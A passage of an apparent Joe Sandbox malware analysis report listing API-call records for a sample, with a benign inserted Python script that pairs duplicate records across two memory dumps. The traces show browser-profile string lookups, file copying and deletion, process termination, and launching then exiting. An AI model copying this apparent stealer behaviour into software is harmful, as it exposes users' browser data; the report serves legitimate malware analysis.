                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 04856C2D
                                              • ExitProcess.KERNEL32 ref: 04856C5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                              • String ID: <
                                              • API String ID: 1148417306-4251816714
                                              • Opcode ID: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                              • Instruction ID: e3bed76576d00ede102a6939e7ca644e9185e350c55b1dcc53b99297accc5400
                                              • Opcode Fuzzy Hash: 780f5d4a84c50e8ab2f554c699b202a56bf3eaf7d4713dd72010fd50ff5fac83
                                              • Instruction Fuzzy Hash: ED312CB1C01218ABEB58EB94DC90FEDB778AF58304F404689E605B71A0DFB46B48CF55
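The records above come in pairs: each routine is listed once from the image mapped at 0x00400000 (Source File offset 00400000, based on PE: true) and once from the region at 0x04840000 (based on PE: false), with matching API IDs or Opcode IDs but different refs. The following is an added example and is not part of the Joe Sandbox report. It parses a constructed excerpt of four records copied from this page (the registry-read routine at 004012B4 / 0484151B and the GetModuleFileNameA, ShellExecuteEx, ExitProcess routine at 00416903 / 04856B6A), recovers the constant address delta between the two copies by voting over candidate deltas, pairs the records by their call-site addresses rather than by API name, and reports where the plugin resolved the same call site to a different import in the two copies (HeapAlloc.KERNEL32 versus RtlAllocateHeap.NTDLL). The parsed format is only the bulleted text as it appears on this page; the function and field names are the example's own.

```python
"""Pair duplicated Joe Sandbox function records across two memory dumps.

Added example, not part of the report. REPORT is a constructed, trimmed copy of
four records from the page, keeping only the fields this script reads.
"""
import re
from collections import Counter

REPORT = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
• HeapAlloc.KERNEL32(00000000), ref: 004012BB
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
• RegCloseKey.ADVAPI32(?), ref: 004012FF
Memory Dump Source
• Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 0484151B
• RtlAllocateHeap.NTDLL(00000000), ref: 04841522
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0484153E
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0484155C
• RegCloseKey.ADVAPI32(?), ref: 04841566
Memory Dump Source
• Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
• ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
• ExitProcess.KERNEL32 ref: 004169F5
Memory Dump Source
• Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 04856B6A
  • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
• ShellExecuteEx.SHELL32(0000003C), ref: 04856C2D
• ExitProcess.KERNEL32 ref: 04856C5C
Memory Dump Source
• Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
"""

# One "• Name.MODULE(args), ref: ADDR" line, with or without the
# "Part of subcall function XXXXXXXX:" prefix and with or without an argument list.
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"([A-Za-z_]\w*\.[A-Z0-9]+)(?:\([^)]*\))?,?\s+ref:\s*([0-9A-Fa-f]{8})\s*$"
)
SRC_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]{8}),\s*based on PE:\s*(true|false)")


def parse_records(text):
    """Return one dict per 'APIs' record: calls [(name, addr)], dump base, PE flag."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"calls": [], "base": None, "pe": None}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(s)
        if m:
            cur["calls"].append((m.group(1), int(m.group(2), 16)))
            continue
        m = SRC_RE.search(s)
        if m:
            cur["base"], cur["pe"] = int(m.group(1), 16), m.group(2) == "true"
    return [r for r in records if r["calls"] and r["base"] is not None]


def find_delta(image_recs, region_recs):
    """Mode of (region entry ref - image entry ref) over all record pairs.

    True pairs agree on one delta; mismatched pairs scatter, so the mode wins.
    """
    votes = Counter(
        b["calls"][0][1] - a["calls"][0][1] for a in image_recs for b in region_recs
    )
    if not votes:
        raise ValueError("need at least one record from each dump")
    return votes.most_common(1)[0][0]


def pair_records(records):
    """Match each region record to the image record with the same call sites.

    Matching uses call-site addresses shifted by the delta, not API names, so a
    call site resolved to a different import still pairs. Returns (delta,
    extra_shift, pairs); extra_shift is the part of the delta beyond the
    difference between the two dump base addresses.
    """
    image = [r for r in records if r["pe"]]
    region = [r for r in records if not r["pe"]]
    delta = find_delta(image, region)
    extra_shift = delta - (region[0]["base"] - image[0]["base"])
    by_sites = {tuple(addr for _, addr in r["calls"]): r for r in image}
    pairs = []
    for b in region:
        a = by_sites.get(tuple(addr - delta for _, addr in b["calls"]))
        if a is None:
            continue  # no image record with exactly these call sites
        renamed = [(na, nb) for (na, _), (nb, _) in zip(a["calls"], b["calls"]) if na != nb]
        pairs.append({"image_entry": a["calls"][0][1],
                      "region_entry": b["calls"][0][1], "renamed": renamed})
    return delta, extra_shift, pairs


if __name__ == "__main__":
    delta, extra, pairs = pair_records(parse_records(REPORT))
    print(f"delta 0x{delta:08X} (base difference plus 0x{extra:X})")
    for p in pairs:
        print(f"  {p['image_entry']:08X} <-> {p['region_entry']:08X}  renamed: {p['renamed']}")
```

Pairing on call-site addresses rather than on the API ID string is what lets the first pair match even though the report names the second call HeapAlloc in one copy and RtlAllocateHeap in the other. On the refs above the delta comes out as 0x04440267: the 0x04440000 difference between the two dump bases plus a further 0x267, which the function returns separately so the reader can confirm it against any other pair of records on this page.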
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                              • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                              • wsprintfW.USER32 ref: 00418F08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesswsprintf
                                              • String ID: %hs
                                              • API String ID: 659108358-2783943728
                                              • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                              • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                              • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                              • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040AA11
                                              • lstrlenA.KERNEL32(00000000,00000000), ref: 0040AB2F
                                              • lstrlenA.KERNEL32(00000000), ref: 0040ADEC
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AE73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                              • Instruction ID: 5dfe8597df33c788f82f0551f3ba8d02d272d38f024b71a471f8e3c501a58f6f
                                              • Opcode Fuzzy Hash: badd0b16bebf4880951e4b22bfce0ef8fa2e65dd17f4c9611185429b7f8720ee
                                              • Instruction Fuzzy Hash: A9E134729111089BCB04FBA5DC66EEE7339AF14314F40855EF11672091EF387A9CCB6A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484AC78
                                              • lstrlen.KERNEL32(00000000,00000000), ref: 0484AD96
                                              • lstrlen.KERNEL32(00000000), ref: 0484B053
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484B0DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                              • String ID:
                                              • API String ID: 257331557-0
                                              • Opcode ID: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                              • Instruction ID: bd83713bfe31552b5a405513a86b5fd417d21d1ccd2f13918a7429de7f9531ea
                                              • Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
                                              • Instruction Fuzzy Hash: F8E1B672D001189ADB5DFBA8DC90DEE7339AF54205F504B59E916B60A0EFB07A4CCB61
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                              • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                              • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                              • Opcode Fuzzy Hash: 4c1525e857f093a45c2341733fa41754f3496238513f024d29210b144bef9689
                                              • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484D7E8
                                              • lstrlen.KERNEL32(00000000), ref: 0484D9FF
                                              • lstrlen.KERNEL32(00000000), ref: 0484DA13
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484DA92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                              • Instruction ID: 8d228ac00a7133ba15f76ee5de4e63015de00245f7eb0561e4100d6c0c9bc79f
                                              • Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
                                              • Instruction Fuzzy Hash: 6591D471D001189BDB1CFBA8DC94EEE7335AF54205F504B69E916F60A0EFB47A48CB62
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
                                              • lstrlenA.KERNEL32(00000000), ref: 0040DA9F
                                              • lstrlenA.KERNEL32(00000000), ref: 0040DAB3
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040DB32
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                              • Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
                                              • Opcode Fuzzy Hash: 1acd3d45d618d939c79b20cdc9903d53f52bed8242236e24ba2a76c9b265152c
                                              • Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484DB68
                                              • lstrlen.KERNEL32(00000000), ref: 0484DD06
                                              • lstrlen.KERNEL32(00000000), ref: 0484DD1A
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484DD99
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                              • String ID:
                                              • API String ID: 211194620-0
                                              • Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                              • Instruction ID: 0f900b423e2b42637114abc4b693649422fb891a3ddec98ddfce738a8aae37e8
                                              • Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
                                              • Instruction Fuzzy Hash: E381C571D101189BDB1CFBA8DC94DEE7335AF54209F504B69E916E60B0EFB47A08CB62
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustPointer
                                              • String ID:
                                              • API String ID: 1740715915-0
                                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                              • Instruction ID: 28add361e2a9cf4593a389e6c75f23d2bc3fed63c3fb9df6c115748677489d67
                                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                              • Instruction Fuzzy Hash: 27519A72600206AFEB29DF58DC40AEA77A5EB44314F148A2DEB85D6390E771B841CBD1
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
                                              • lstrlenA.KERNEL32(00000000), ref: 0040F66B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                              • API String ID: 998311485-3310892237
                                              • Opcode ID: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                              • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                              • Opcode Fuzzy Hash: 523766ba9e6db3e821a6d2c1536c81079b0302e78173aef5b8d6937599c7b161
                                              • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                              APIs
                                              • memset.MSVCRT ref: 0041967B
                                                • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
                                              • CloseHandle.KERNEL32(00000000), ref: 00419766
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                              • String ID:
                                              • API String ID: 396451647-0
                                              • Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                              • Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
                                              • Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
                                              • Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56
                                              APIs
                                              • memset.MSVCRT ref: 048598E2
                                                • Part of subcall function 04859147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,04859915,00000000), ref: 04859152
                                                • Part of subcall function 04859147: RtlAllocateHeap.NTDLL(00000000), ref: 04859159
                                                • Part of subcall function 04859147: wsprintfW.USER32 ref: 0485916F
                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 048599A2
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 048599C0
